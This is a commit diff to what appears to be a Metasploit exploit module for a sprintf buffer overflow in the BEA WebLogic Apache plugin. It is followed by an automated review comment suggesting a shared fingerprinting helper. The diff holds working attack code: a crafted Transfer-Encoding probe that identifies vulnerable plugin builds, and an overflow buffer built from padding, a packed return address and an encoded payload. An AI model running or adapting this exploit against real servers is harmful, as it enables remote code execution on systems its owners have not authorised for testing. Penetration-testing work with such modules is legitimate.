fingerprinting bea connector with Transfer-Encoding
parent
9a5e4d6500
commit
a21e832336
|
@ -25,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
requests resulting in a buffer overflow due to the insecure usage
|
||||
of sprintf.
|
||||
|
||||
The Weblogic Apache plugin version is fingerprinted with a POST
|
||||
request containing a specially crafted Transfer-Encoding header.
|
||||
|
||||
At this moment this module works over Windows systems without DEP
|
||||
and has been tested with Windows 2000 / XP.
|
||||
},
|
||||
|
@ -78,24 +81,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The URI path to a jsp or object provided by Weblogic", '/index.jsp'])
|
||||
OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['PATH'],
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => -1
|
||||
}
|
||||
})
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => my_data
|
||||
},
|
||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 500
|
||||
if res and res.code == 200
|
||||
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
|
@ -139,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
uri = datastore['PATH']
|
||||
uri = target_uri.path
|
||||
sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
|
||||
sploit << [my_target.ret].pack("V")
|
||||
sploit << payload.encoded
|
||||
|
@ -158,17 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => target_uri.path,
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => -1
|
||||
}
|
||||
'Transfer-Encoding' => my_data
|
||||
},
|
||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 500
|
||||
if res and res.code == 200
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
res.body =~ /Change Number:<\/B> <I>779586/
|
||||
|
|
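Review bot: The fingerprint probe added to `check` in the second hunk (the `send_request_cgi` call with the random `Transfer-Encoding` header and the `"#{my_data.length}\r\n#{my_data}\r\n0\r\n"` body) is repeated verbatim in the automatic-target method of the last hunk, down to the `rand_text_alpha(rand(5) + 8)` seed and the `Build date\/time` / `Change Number` regex pair, so a change to the probe or to the fingerprint strings now has to be made twice. A private helper that issues the request and returns the response would let both call sites share it, as sketched below. One thing worth a comment at that helper: the chunk-size line uses the decimal `my_data.length`, whereas a chunked body would carry a hexadecimal size, so for lengths 10–12 the declared and actual sizes disagree; that is presumably intended, since the `Transfer-Encoding` value is random text rather than `chunked`, but the next reader will not know it was deliberate. The tail of `check` and the head of the automatic-target method lie outside their hunks.
```ruby
  # Sends the single fingerprinting POST used by both check and the
  # automatic target selection; returns the response (nil if no reply).
  # The body is deliberately *not* well-formed chunked data: the size
  # line is decimal and the Transfer-Encoding token is random text.
  def fingerprint_plugin
    my_data = rand_text_alpha(rand(5) + 8)
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => target_uri.path,
      'headers' => { 'Transfer-Encoding' => my_data },
      'data'    => "#{my_data.length}\r\n#{my_data}\r\n0\r\n"
    })
  end

  def check
    res = fingerprint_plugin
    if res and res.code == 200
      # … unchanged: Build date/time and Change Number matching …
```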